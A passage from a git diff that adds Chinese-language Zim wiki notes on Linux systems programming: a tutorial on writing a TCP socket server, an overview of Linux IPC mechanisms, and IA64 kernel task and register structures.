我认为 sleep 只能出现在测试代码中,比如写单元测试的时候。(涉及时间的单元测试不那么好写,短的如一两秒钟可以用 sleep,长的如一小时一天得想其他办法,比如把算法提出来并把时间注入进去。)产品代码中线程的等待可分为两种:一种是无所事事的时候(要么等在 select/poll/epoll 上。要么等在 condition variable 上,等待 BlockingQueue /CountDownLatch 亦可归入此类),一种是等着进入临界区(等在 mutex 上)以便继续处理。在程序的正常执行中,如果需要等待一段时间,应该往 event loop 里注册一个 timer,然后在 timer 的回调函数里接着干活,因为线程是个珍贵的共享资源,不能轻易浪费。如果多线程的安全性和效率要靠代码主动调用 sleep 来保证,这是设计出了问题。等待一个事件发生,正确的做法是用 select 或 condition variable 或(更理想地)高层同步工具。当然,在 GUI 编程中会有主动让出 CPU 的做法,比如调用 sleep(0) 来实现 yield。
|
||||
118
Zim/Programme/APUE/套接字详解.txt
Normal file
@@ -0,0 +1,118 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T18:30:58+08:00
|
||||
|
||||
====== 套接字详解 ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://edsionte.com/techblog/archives/2713
|
||||
Linux下的socket编程-服务器
|
||||
2011/03/15 by edsionte Leave a reply »
|
||||
|
||||
我们都知道,同一台计算机上的进程可以通过IPC(进程间通信)机制进行通信;而不同机算计上运行的进程则通过网络IPC,即套接字(socket)进行通信。Linux下的socket API是基于BSD套接口而是实现的,通过这些统一的API就可以轻松实现进程间的网络通信。此外,socket API即可用于面向连接(TCP)的数据传输,又可用于无连接(UDP)的数据传输。一般使用Client/Server交互模型进行通信。
|
||||
|
||||
本文以及下文将实现一个面向连接的C/S通信模型。本文首先介绍服务器端的实现。
|
||||
|
||||
1.创建套接字
|
||||
1 #include < sys/socket.h >
|
||||
2 int socket(int domain, int type, int protocol);
|
||||
|
||||
通过socket函数可以创建一个套接字描述符,这个描述符类似文件描述符。通过这个套接字描述符就可以对服务器进行各种相关操作。
|
||||
|
||||
该函数包含三个参数,domain参数用于指定所创建套接字的协议类型。通常选用AF_INET,表示使用IPv4的TCP/IP协议;如果只在本机内进行进程间通信,则可以使用AF_UNIX。参数type用来指定套接字的类型,SOCK_STREAM用于创建一个TCP流的套接字,SOCK_DGRAM用于创建UDP数据报套接字。参数protocol通常取0。对于本文所描述的服务器,创建套接字的示例代码如下:
|
||||
1 if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
|
||||
2
|
||||
3 printf("socket error!\n");
|
||||
4 exit(1);
|
||||
5 }
|
||||
|
||||
2.绑定套接字
|
||||
|
||||
对于服务器而言,它的IP地址和端口号一般是固定的。服务器的IP即为本地IP,而服务器的端口号则需要显示的指定。通过bind函数可将服务器套接字和一个指定的端口号进行绑定。
|
||||
|
||||
在具体介绍绑定函数之前,先说明一下socket中的套接字地址结构。由于套接字是通过IP地址和端口号来唯一确定的,因此socket提供了一种通用的套接字地址结构:
|
||||
1 struct sockaddr {
|
||||
2 sa_family_t sa_family;
|
||||
3 char sa_data[14];
|
||||
4 }
|
||||
|
||||
sa_family指定了套接字对应的协议类型,如果使用TCP/IP协议则改制为AF_INET;sa_data则用来存储具体的套接字地址。不过在实际应用中,每个具体的协议族都有自己的协议地址格式。比如TCP/IP协议组对应的套接字地址结构体为:
|
||||
01 struct sockaddr_in {
|
||||
02 short int sin_family; /* Address family */
|
||||
03 unsigned short int sin_port; /* Port number */
|
||||
04 struct in_addr sin_addr; /* Internet address */
|
||||
05 unsigned char sin_zero[8]; /* Same size as struct sockaddr */
|
||||
06 };
|
||||
07
|
||||
08 struct in_addr {
|
||||
09 unsigned long s_addr;
|
||||
10 };
|
||||
|
||||
该地址结构和sockaddr结构均为16字节,因此通常在编写基于TCP/IP协议的网络程序时,使用sockaddr_in来设置具体地址,然后再通过强制类型转换为sockaddr类型。
|
||||
|
||||
绑定函数的函数原型如下:
|
||||
1 #include < sys/socket.h >
|
||||
2 int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
|
||||
参数sockfd即服务器的套接字描述符;addr参数指定了将socket绑定到的本地地址;addrlen则为所使用的地址结构的长度。示例代码如下:
|
||||
01 memset(&my_addr, 0, sizeof(struct sockaddr_in));
|
||||
02 my_addr.sin_family = AF_INET;
|
||||
03 my_addr.sin_port = htons(SERV_PORT);
|
||||
04 my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
05
|
||||
06 if(bind(sockfd, (struct sockaddr *)&my_addr,
|
||||
07 sizeof(struct sockaddr_in)) == -1) {
|
||||
08
|
||||
09 printf("bind error!\n");
|
||||
10 exit(1);
|
||||
11 }
|
||||
|
||||
注意在上述代码中,将IP地址设置为INADDR_ANY,这样就既适合单网卡的计算机又适合多网卡的计算机。
|
||||
|
||||
3.在套接字上监听
|
||||
|
||||
对于C/S模型来说,通常是客户端主动的对服务器端发送连接请求,服务器接收到请求后再具体进行处理。服务器只有调用了listen函数才能宣告自己可以接受客户端的连接请求,也就是说,服务器此时处于被动监听状态。listen函数的原型如下:
|
||||
1 #include < sys/socket.h >
|
||||
2 int listen(int sockfd, int backlog);
|
||||
|
||||
sockfd为服务器端的套接字描述符,backlog指定了该服务器所能连接客户端的最大数目。超过这个连接书目后,服务器将拒绝接受客户端的连接请求。示例代码如下:
|
||||
1 #define BACKLOG 10
|
||||
2 if(listen(sockfd, BACKLOG) == -1) {
|
||||
3
|
||||
4 printf("listen error!\n");
|
||||
5 exit(1);
|
||||
6 }
|
||||
|
||||
4.接受连接
|
||||
|
||||
listen函数只是将服务器套接字设置为等待客户端连接请求的状态,真正接受客户端连接请求的是accept函数:
|
||||
1 #include < sys/socket.h >
|
||||
2 int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
|
||||
accept函数中所使用的参数都在上面的API中有所描述。accept函数执行成功后将返回一个代表客户端的套接字描述符,服务器进程通过该套接字描述符就可以与客户端进行数据交换。
|
||||
|
||||
5.数据传输
|
||||
|
||||
由于socket适用多个数据传输协议,则不同的协议就对应不同的数据传输函数。与TCP协议对应的发送数据和接受数据的函数如下:
|
||||
1 #include < sys/socket.h >
|
||||
2 #include < sys/types.h >
|
||||
3 ssize_t send(int sockfd, const void *buf, size_t len, int flags);
|
||||
4 ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
|
||||
从这两个函数的原型可以看书,socket中的数据传输函数与普通文件的读写函数类似,只不过第一个参数需要传递套接字描述符;buf指定数据缓冲区;len为所传输数据的长度;flag一般取0。示例代码如下:
|
||||
01 while (1) {
|
||||
02 sin_size = sizeof(struct sockaddr_in);
|
||||
03 if ((client_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &sin_size)) == -1) {
|
||||
04 printf("accept error!\n");
|
||||
05 continue;
|
||||
06 }
|
||||
07 /*
|
||||
08 *进行相应的数据处理;
|
||||
09 */
|
||||
10 }
|
||||
|
||||
如示例代码所示,通过while循环使得服务器对客户端进行持续监听。如果客户端有连接请求则新建一个代表客户端的套接字描述符,进而进行对客户端数据的接受和发送。
|
||||
|
||||
上述的几个函数属于网络编程中最基本的也是最关键的几个API,依次通过上述的方法就可以完成服务器端的程序的编写,具体的过程还可以参考下图:
|
||||
|
||||
正如上图所示,在处理完客户端的数据传输请求后,必须通过close函数关闭客户端的连接。
|
||||
{{./server-86x300.jpg}}
|
||||
BIN
Zim/Programme/APUE/套接字详解/server-86x300.jpg
Normal file
|
After Width: | Height: | Size: 11 KiB |
51
Zim/Programme/APUE/深刻理解Linux进程间通信(IPC).txt
Normal file
@@ -0,0 +1,51 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-23T00:58:04+08:00
|
||||
|
||||
====== 深刻理解Linux进程间通信(IPC) ======
|
||||
Created Tuesday 23 August 2011
|
||||
深刻理解Linux进程间通信(IPC)
|
||||
|
||||
郑彦兴 (mlinux@163.com)国防科大计算机学院
|
||||
|
||||
简介: 一个大型的应用系统,往往需要众多进程协作,进程(Linux进程概念见附1)间通信的重要性显而易见。本系列文章阐述了Linux环境下的几种主要进程间通信手段,并针对每个通信手段关键技术环节给出详细实例。为达到阐明问题的目的,本文还对某些通信手段的内部实现机制进行了分析。
|
||||
|
||||
序
|
||||
|
||||
linux下的进程通信手段基本上是从Unix平台上的进程通信手段继承而来的。而对Unix发展做出重大贡献的两大主力AT&T的贝尔实验室及BSD(加州大学伯克利分校的伯克利软件发布中心)在进程间通信方面的侧重点有所不同。前者对Unix早期的进程间通信手段进行了系统的改进和扩充,形成了“system V IPC”,通信进程局限在单个计算机内;后者则跳过了该限制,形成了基于套接口(socket)的进程间通信机制。Linux则把两者继承了下来,如图示:
|
||||
{{./1.gif}}
|
||||
|
||||
其中,最初Unix IPC包括:管道、FIFO、信号;System V IPC包括:System V消息队列、System V信号灯、System V共享内存区;Posix IPC包括: Posix消息队列、Posix信号灯、Posix共享内存区。有两点需要简单说明一下:1)由于Unix版本的多样性,电子电气工程协会(IEEE)开发了一个独立的Unix标准,这个新的ANSI Unix标准被称为计算机环境的可移植性操作系统界面(PSOIX)。现有大部分Unix和流行版本都是遵循POSIX标准的,而Linux从一开始就遵循POSIX标准;2)BSD并不是没有涉足单机内的进程间通信(socket本身就可以用于单机内的进程间通信)。事实上,很多Unix版本的单机IPC留有BSD的痕迹,如4.4BSD支持的匿名内存映射、4.3+BSD对可靠信号语义的实现等等。
|
||||
|
||||
图一给出了linux 所支持的各种IPC手段,在本文接下来的讨论中,为了避免概念上的混淆,在尽可能少提及Unix的各个版本的情况下,所有问题的讨论最终都会归结到Linux环境下的进程间通信上来。并且,对于Linux所支持通信手段的不同实现版本(如对于共享内存来说,有Posix共享内存区以及System V共享内存区两个实现版本),将主要介绍Posix API。
|
||||
|
||||
linux下进程间通信的几种主要手段简介:
|
||||
|
||||
管道(Pipe)及有名管道(named pipe):管道可用于具有亲缘关系进程间的通信,有名管道克服了管道没有名字的限制,因此,除具有管道所具有的功能外,它还允许无亲缘关系进程间的通信;
|
||||
信号(Signal):信号是比较复杂的通信方式,用于通知接受进程有某种事件发生,除了用于进程间通信外,进程还可以发送信号给进程本身;linux除了支持Unix早期信号语义函数sigal外,还支持语义符合Posix.1标准的信号函数sigaction(实际上,该函数是基于BSD的,BSD为了实现可靠信号机制,又能够统一对外接口,用sigaction函数重新实现了signal函数);
|
||||
报文(Message)队列(消息队列):消息队列是消息的链接表,包括Posix消息队列system V消息队列。有足够权限的进程可以向队列中添加消息,被赋予读权限的进程则可以读走队列中的消息。消息队列克服了信号承载信息量少,管道只能承载无格式字节流以及缓冲区大小受限等缺点。
|
||||
共享内存:使得多个进程可以访问同一块内存空间,是最快的可用IPC形式。是针对其他通信机制运行效率较低而设计的。往往与其它通信机制,如信号量结合使用,来达到进程间的同步及互斥。
|
||||
信号量(semaphore):主要作为进程间以及同一进程不同线程之间的同步手段。
|
||||
套接口(Socket):更为一般的进程间通信机制,可用于不同机器之间的进程间通信。起初是由Unix系统的BSD分支开发出来的,但现在一般可以移植到其它类Unix系统上:Linux和System V的变种都支持套接字。
|
||||
|
||||
下面将对上述通信机制做具体阐述。
|
||||
|
||||
附1:参考文献[2]中对linux环境下的进程进行了概括说明:
|
||||
|
||||
一般来说,linux下的进程包含以下几个关键要素:
|
||||
|
||||
有一段可执行程序;
|
||||
有专用的系统堆栈空间;
|
||||
内核中有它的控制块(进程控制块),描述进程所占用的资源,这样,进程才能接受内核的调度;
|
||||
具有独立的存储空间
|
||||
|
||||
进程和线程有时候并不完全区分,而往往根据上下文理解其含义。
|
||||
|
||||
参考资料
|
||||
|
||||
UNIX环境高级编程,作者:W.Richard Stevens,译者:尤晋元等,机械工业出版社。具有丰富的编程实例,以及关键函数伴随Unix的发展历程。
|
||||
|
||||
linux内核源代码情景分析(上、下),毛德操、胡希明著,浙江大学出版社,提供了对linux内核非常好的分析,同时,对一些关键概念的背景进行了详细的说明。
|
||||
|
||||
UNIX网络编程第二卷:进程间通信,作者:W.Richard Stevens,译者:杨继张,清华大学出版社。一本比较全面阐述Unix环境下进程间通信的书(没有信号和套接口,套接口在第一卷中)。
|
||||
|
||||
BIN
Zim/Programme/APUE/深刻理解Linux进程间通信(IPC)/1.gif
Normal file
|
After Width: | Height: | Size: 3.6 KiB |
1322
Zim/Programme/APUE/网络编程指南.txt
Normal file
268
Zim/Programme/APUE/进程和线程.txt
Normal file
@@ -0,0 +1,268 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:07:31+08:00
|
||||
|
||||
====== 进程和线程 ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://bbs.chinaunix.net/thread-2289758-1-3.html
|
||||
进程在OS中是一个非常关键的抽象概念。
|
||||
在OS中虚拟CPU称为执行线程,简称为线程。
|
||||
用于创建和管理多执行线程的实用工具通常包含在一个pthread库。因为该库中接口是按照POSIX标准定义的,所以以p开头。
|
||||
|
||||
在UNIX Os中,单线程进程和多线程进程模型如下:
|
||||
见帖子最下面 图1
|
||||
{{./1.jpg}}
|
||||
在linux中,单线程任务和多线程任务组模型如下:
|
||||
见帖子最下面 图2
|
||||
{{./2.jpg}}
|
||||
在linux Os中,用“任务”替代“进程”,而没有“进程”这个对象。
|
||||
用数据结构task_struct来描述任务,任务就相当于UNIX OS中的进程。 每一个任务都有任务地址空间(相当于UNIX OS中的进程地址空间),但一个任务中只有一个线程。通过“任务组”这个概念来实现多线程任务(相当于UNIX中的多线程进程)。
|
||||
|
||||
可以这样简单地说:“Linux的任务是UNIX单线程进程的对等体”。
|
||||
|
||||
用于描述任务的数据结构task_struct,是一个信息量非常大的数据结构。但是并不是每一个线程都会有完整的task_struct成员,而只是保留了需要的成员变量值。在多线程的任务组中,每个线程都有一个task_struct数据结构来描述线程所在的任务。但是所有的线程都共享所在任务组的资源和相关信息,所以这些副本是一种浪费。实际上,并不是这么糟糕,大多数任务的成员变量是一些单独的对象,共享这些对象的线程,仅仅保存了对它的引用。
|
||||
|
||||
在linux操作系统中,定义了一个指向当前任务的指针current
|
||||
在单处理器中,任何时刻只有一个任务在执行,current指针指向的任务在执行,current是一个全局变量。
|
||||
在多处理器中,在同一时刻可以有多个任务在执行,那么在OS中可以看到的每个CPU上(也就是“执行线程”)有一个current指针,并且都是局部变量。
|
||||
由于current使用地过于频繁,OS都把current申明为寄存器变量。在IA64平台下,通用寄存器r13用来保存current指针。
|
||||
/*
|
||||
* In kernel mode, thread pointer (r13) is used to point to the current task
|
||||
* structure.
|
||||
*/
|
||||
#define _IA64_REG_TP 1037 /* R13 */
|
||||
#define current ((struct task_struct *) ia64_getreg(_IA64_REG_TP))
|
||||
|
||||
创建任务
|
||||
在linux Os中创建任务(也就是创建进程和线程,只不过在Linux中没有进程的概念了,用任务替换了进程的概念,并且任务都是单线程的,多线程的任务称为任务组)根据不同的体系结构不同。我们在此之讨论在IA64结构下的实现办法。
|
||||
在linux Os中没有提供用于创建原始线程的函数,因为除了系统启动的初始线程外(即PID为0的线程),任何一个线程都是从原有的线程上复制过来的而产生的。
|
||||
通过copy_thread函数创建新的线程。
|
||||
int copy_thread (int nr, unsigned long clone_flags,
|
||||
unsigned long user_stack_base, unsigned long user_stack_size,
|
||||
struct task_struct *p, struct pt_regs *regs)
|
||||
这个函数在linux中封装成copy_process函数(用于创建任务),再一次被封装成函数do_fork(创建一个任务)和函数fork_idle(创建空闲任务或者说是空闲进程、空闲线程)
|
||||
,函数do_fork再一次被封装成系统调用sys_fork。
|
||||
|
||||
内核创建新的任务步骤:
|
||||
1、为新任务分配内存:在内核内存空间分配一块连续的内存用于保存task_struct、thread_struct(和平台相关,一般几个字节到大于1KB不等)、内核堆栈。
|
||||
2、初始化任务结构(task_struct),但还没有初始化thread_struct。
|
||||
3、初始化thread_struct
|
||||
4、完成初始化task_struct中剩余的与平台无关的部分
|
||||
5、将新创建的任务添加到运行队列中,这就可以运行了
|
||||
|
||||
task_struct分成两个部分:平台无关的部分和平台特定部分(线程结构)。
|
||||
在创建任务过程中涉及到几个非常重要的数据结构:pt_regs、switch_stack、thread_struct等
|
||||
|
||||
pt_regs结构:
|
||||
这个结构封装了需要在内核入口中保存的最少的状态信息。比如说每一次的系统调用、中断、陷阱、故障时,pt_regs结构中保存了最少的状态信息。该结构中主要保存了必要的scratch类型的寄存器。(在现代IA64架构中还有3类寄存器:scratch寄存器、保持寄存器、专用寄存器)。在每一次的系统调用、中断、陷阱、故障发生时,依次会发生下列事件:
|
||||
1、在内核堆栈上为pt_regs结构分配内存
|
||||
2、在pt_regs结构中保存scratch寄存器
|
||||
3、调用了适当的内核处理器(执行系统调用内部处理、中断处理程序等)
|
||||
4、从pt_regs中恢复scratch寄存器
|
||||
5、从内核堆栈中释放pt_regs占用的内存
|
||||
应该保持pt_regs尽可能的小,可以提高性能。
|
||||
在IA64平台的Linux中pt_regs定义如下:
|
||||
struct pt_regs {
|
||||
/* The following registers are saved by SAVE_MIN: */
|
||||
unsigned long b6; /* scratch */
|
||||
unsigned long b7; /* scratch */
|
||||
|
||||
unsigned long ar_csd; /* used by cmp8xchg16 (scratch) */
|
||||
unsigned long ar_ssd; /* reserved for future use (scratch) */
|
||||
|
||||
unsigned long r8; /* scratch (return value register 0) */
|
||||
unsigned long r9; /* scratch (return value register 1) */
|
||||
unsigned long r10; /* scratch (return value register 2) */
|
||||
unsigned long r11; /* scratch (return value register 3) */
|
||||
|
||||
unsigned long cr_ipsr; /* interrupted task's psr */
|
||||
unsigned long cr_iip; /* interrupted task's instruction pointer */
|
||||
/*
|
||||
* interrupted task's function state; if bit 63 is cleared, it
|
||||
* contains syscall's ar.pfs.pfm:
|
||||
*/
|
||||
unsigned long cr_ifs;
|
||||
|
||||
unsigned long ar_unat; /* interrupted task's NaT register (preserved) */
|
||||
unsigned long ar_pfs; /* prev function state */
|
||||
unsigned long ar_rsc; /* RSE configuration */
|
||||
/* The following two are valid only if cr_ipsr.cpl > 0 || ti->flags & _TIF_MCA_INIT */
|
||||
unsigned long ar_rnat; /* RSE NaT */
|
||||
unsigned long ar_bspstore; /* RSE bspstore */
|
||||
|
||||
unsigned long pr; /* 64 predicate registers (1 bit each) */
|
||||
unsigned long b0; /* return pointer (bp) */
|
||||
unsigned long loadrs; /* size of dirty partition << 16 */
|
||||
|
||||
unsigned long r1; /* the gp pointer */
|
||||
unsigned long r12; /* interrupted task's memory stack pointer */
|
||||
unsigned long r13; /* thread pointer */
|
||||
|
||||
unsigned long ar_fpsr; /* floating point status (preserved) */
|
||||
unsigned long r15; /* scratch */
|
||||
|
||||
/* The remaining registers are NOT saved for system calls. */
|
||||
|
||||
unsigned long r14; /* scratch */
|
||||
unsigned long r2; /* scratch */
|
||||
unsigned long r3; /* scratch */
|
||||
|
||||
/* The following registers are saved by SAVE_REST: */
|
||||
unsigned long r16; /* scratch */
|
||||
unsigned long r17; /* scratch */
|
||||
unsigned long r18; /* scratch */
|
||||
unsigned long r19; /* scratch */
|
||||
unsigned long r20; /* scratch */
|
||||
unsigned long r21; /* scratch */
|
||||
unsigned long r22; /* scratch */
|
||||
unsigned long r23; /* scratch */
|
||||
unsigned long r24; /* scratch */
|
||||
unsigned long r25; /* scratch */
|
||||
unsigned long r26; /* scratch */
|
||||
unsigned long r27; /* scratch */
|
||||
unsigned long r28; /* scratch */
|
||||
unsigned long r29; /* scratch */
|
||||
unsigned long r30; /* scratch */
|
||||
unsigned long r31; /* scratch */
|
||||
|
||||
unsigned long ar_ccv; /* compare/exchange value (scratch) */
|
||||
|
||||
/*
|
||||
* Floating point registers that the kernel considers scratch:
|
||||
*/
|
||||
struct ia64_fpreg f6; /* scratch */
|
||||
struct ia64_fpreg f7; /* scratch */
|
||||
struct ia64_fpreg f8; /* scratch */
|
||||
struct ia64_fpreg f9; /* scratch */
|
||||
struct ia64_fpreg f10; /* scratch */
|
||||
struct ia64_fpreg f11; /* scratch */
|
||||
};
|
||||
switch_stack结构:
|
||||
该结构用在内核将执行一个线程切换到另一个线程之时,该结构主要保存了保持寄存器。pt_regs和switch_stack结合起来,一起封装了每个线程正确运行所需的最低限度的机器状态。这种机器状态称为高度管理状态(eagerly managed state),与松散管理状态(lazily managed state)相对。
|
||||
简单地说switch_stack保存了任务切换的上下文,主要保存了保持寄存器。
|
||||
在IA64架构的linux中,switch_stack定义如下:
|
||||
struct switch_stack {
|
||||
unsigned long caller_unat; /* user NaT collection register (preserved) */
|
||||
unsigned long ar_fpsr; /* floating-point status register */
|
||||
|
||||
struct ia64_fpreg f2; /* preserved */
|
||||
struct ia64_fpreg f3; /* preserved */
|
||||
struct ia64_fpreg f4; /* preserved */
|
||||
struct ia64_fpreg f5; /* preserved */
|
||||
|
||||
struct ia64_fpreg f12; /* scratch, but untouched by kernel */
|
||||
struct ia64_fpreg f13; /* scratch, but untouched by kernel */
|
||||
struct ia64_fpreg f14; /* scratch, but untouched by kernel */
|
||||
struct ia64_fpreg f15; /* scratch, but untouched by kernel */
|
||||
struct ia64_fpreg f16; /* preserved */
|
||||
struct ia64_fpreg f17; /* preserved */
|
||||
struct ia64_fpreg f18; /* preserved */
|
||||
struct ia64_fpreg f19; /* preserved */
|
||||
struct ia64_fpreg f20; /* preserved */
|
||||
struct ia64_fpreg f21; /* preserved */
|
||||
struct ia64_fpreg f22; /* preserved */
|
||||
struct ia64_fpreg f23; /* preserved */
|
||||
struct ia64_fpreg f24; /* preserved */
|
||||
struct ia64_fpreg f25; /* preserved */
|
||||
struct ia64_fpreg f26; /* preserved */
|
||||
struct ia64_fpreg f27; /* preserved */
|
||||
struct ia64_fpreg f28; /* preserved */
|
||||
struct ia64_fpreg f29; /* preserved */
|
||||
struct ia64_fpreg f30; /* preserved */
|
||||
struct ia64_fpreg f31; /* preserved */
|
||||
|
||||
unsigned long r4; /* preserved */
|
||||
unsigned long r5; /* preserved */
|
||||
unsigned long r6; /* preserved */
|
||||
unsigned long r7; /* preserved */
|
||||
|
||||
unsigned long b0; /* so we can force a direct return in copy_thread */
|
||||
unsigned long b1;
|
||||
unsigned long b2;
|
||||
unsigned long b3;
|
||||
unsigned long b4;
|
||||
unsigned long b5;
|
||||
|
||||
unsigned long ar_pfs; /* previous function state */
|
||||
unsigned long ar_lc; /* loop counter (preserved) */
|
||||
unsigned long ar_unat; /* NaT bits for r4-r7 */
|
||||
unsigned long ar_rnat; /* RSE NaT collection register */
|
||||
unsigned long ar_bspstore; /* RSE dirty base (preserved) */
|
||||
unsigned long pr; /* 64 predicate registers (1 bit each) */
|
||||
};
|
||||
thread_struct结构:
|
||||
该结构封装了松散管理状态,主要封装了内核堆栈指针ksp,ksp指向swicth_stack。松散管理状态,并不是每次上下文切换时都要切换松散管理状态,往往只在确实需要新的状态时才切换松散管理状态。切换松散管理状态比切换高度管理状态慢很多,所以尽量不切换松散管理状态,以提高性能。
|
||||
struct thread_struct {
|
||||
__u32 flags; /* various thread flags (see IA64_THREAD_*) */
|
||||
/* writing on_ustack is performance-critical, so it's worth spending 8 bits on it... */
|
||||
__u8 on_ustack; /* executing on user-stacks? */
|
||||
__u8 pad[3];
|
||||
__u64 ksp; /* kernel stack pointer */
|
||||
__u64 map_base; /* base address for get_unmapped_area() */
|
||||
__u64 task_size; /* limit for task size */
|
||||
__u64 rbs_bot; /* the base address for the RBS */
|
||||
int last_fph_cpu; /* CPU that may hold the contents of f32-f127 */
|
||||
|
||||
#ifdef CONFIG_IA32_SUPPORT
|
||||
__u64 eflag; /* IA32 EFLAGS reg */
|
||||
__u64 fsr; /* IA32 floating pt status reg */
|
||||
__u64 fcr; /* IA32 floating pt control reg */
|
||||
__u64 fir; /* IA32 fp except. instr. reg */
|
||||
__u64 fdr; /* IA32 fp except. data reg */
|
||||
__u64 old_k1; /* old value of ar.k1 */
|
||||
__u64 old_iob; /* old IOBase value */
|
||||
struct ia64_partial_page_list *ppl; /* partial page list for 4K page size issue */
|
||||
/* cached TLS descriptors. */
|
||||
struct desc_struct tls_array[GDT_ENTRY_TLS_ENTRIES];
|
||||
|
||||
# define INIT_THREAD_IA32 .eflag = 0, \
|
||||
.fsr = 0, \
|
||||
.fcr = 0x17800000037fULL, \
|
||||
.fir = 0, \
|
||||
.fdr = 0, \
|
||||
.old_k1 = 0, \
|
||||
.old_iob = 0, \
|
||||
.ppl = NULL,
|
||||
#else
|
||||
# define INIT_THREAD_IA32
|
||||
#endif /* CONFIG_IA32_SUPPORT */
|
||||
#ifdef CONFIG_PERFMON
|
||||
void *pfm_context; /* pointer to detailed PMU context */
|
||||
unsigned long pfm_needs_checking; /* when >0, pending perfmon work on kernel exit */
|
||||
# define INIT_THREAD_PM .pfm_context = NULL, \
|
||||
.pfm_needs_checking = 0UL,
|
||||
#else
|
||||
# define INIT_THREAD_PM
|
||||
#endif
|
||||
__u64 dbr[IA64_NUM_DBG_REGS];
|
||||
__u64 ibr[IA64_NUM_DBG_REGS];
|
||||
struct ia64_fpreg fph[96]; /* saved/loaded on demand */
|
||||
};
|
||||
|
||||
|
||||
在任务创建后,会分配一大块内存给task_struct结构来维护。这块内存具体使用如下图:
|
||||
见帖子最下面 图3
|
||||
{{./3.jpg}}
|
||||
在IA64架构下,Linux 中定义每次分配给任务的地址空间是IA64_STK_OFFSET,如下:
|
||||
#define IA64_STK_OFFSET ((1 << KERNEL_STACK_SIZE_ORDER)*PAGE_SIZE)
|
||||
#if defined(CONFIG_IA64_PAGE_SIZE_4KB)
|
||||
# define KERNEL_STACK_SIZE_ORDER 3
|
||||
#elif defined(CONFIG_IA64_PAGE_SIZE_8KB)
|
||||
# define KERNEL_STACK_SIZE_ORDER 2
|
||||
#elif defined(CONFIG_IA64_PAGE_SIZE_16KB)
|
||||
# define KERNEL_STACK_SIZE_ORDER 1
|
||||
#else
|
||||
# define KERNEL_STACK_SIZE_ORDER 0
|
||||
#endif
|
||||
通过以上语句定义IA64_STK_OFFSET,决定分配内存的大小。就是说,如果系统配置每个页面的大小为4KB的情况下,那么IA64_STK_OFFSET就是8*4KB=32KB;
|
||||
如果PAGE_SIZE=8KB,那么IA64_STK_OFFSET就是4*8KB=32KB;
|
||||
如果PAGE_SIZE=16KB,那么IA64_STK_OFFSET就是2*16KB=32KB;
|
||||
如果PAGE_SIZE=64KB,那么IA64_STK_OFFSET就是1*64KB=64KB;
|
||||
|
||||
在上图中还有一个变量IA64_RBS_BASE,该变量用来描述什么?看linux是如何实现的就知道了,用中文描述,我还真不知道。
|
||||
#define IA64_RBS_OFFSET ((IA64_TASK_SIZE + IA64_THREAD_INFO_SIZE + 31) & ~31)
|
||||
|
||||
DEFINE(IA64_TASK_SIZE, sizeof (struct task_struct));
|
||||
DEFINE(IA64_THREAD_INFO_SIZE, sizeof (struct thread_info));
|
||||
|
||||
|
||||
BIN
Zim/Programme/APUE/进程和线程/1.jpg
Normal file
|
After Width: | Height: | Size: 11 KiB |